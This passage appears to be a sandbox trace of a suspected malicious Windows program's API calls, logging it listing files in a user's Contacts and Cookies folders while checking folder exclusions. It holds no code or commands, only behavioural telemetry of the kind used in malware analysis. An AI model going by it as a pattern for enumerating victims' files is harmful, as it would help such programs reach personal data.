lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0072.981] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.981] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0072.982] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.982] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0072.982] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0072.982] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.982] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x10, dwReserved1=0x657690, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x10, dwReserved1=0x657690, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.983] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x10, dwReserved1=0x657690, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x10, dwReserved1=0x657690, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.984] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.985] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10a007b, ftCreationTime.dwLowDateTime=0xc2576, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x104007c, nFileSizeHigh=0xc2576, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="si\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0072.985] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.985] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.985] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0072.985] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0072.995] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.995] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0072.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0072.995] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0072.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0072.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9b8 [0072.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0072.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0072.996] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Cookies", cAlternateFileName="")) returned 1 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9e8 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0072.996] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb790 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0072.996] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb790 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb790 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0072.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0072.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0072.997] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a70 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690aa0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0072.997] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0072.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0072.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690aa0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a90 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9e8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a9b8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dce8 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0072.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690af0 [0072.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b738 [0072.998] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b70 [0072.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b70 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a50 [0072.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0072.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0072.998] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b70 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a7c0 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a50 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0072.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0072.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa00 [0072.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cookies", cchCount1=7, lpString2="AppData", cchCount2=7) returned 3 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0072.999] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0072.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0072.999] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, 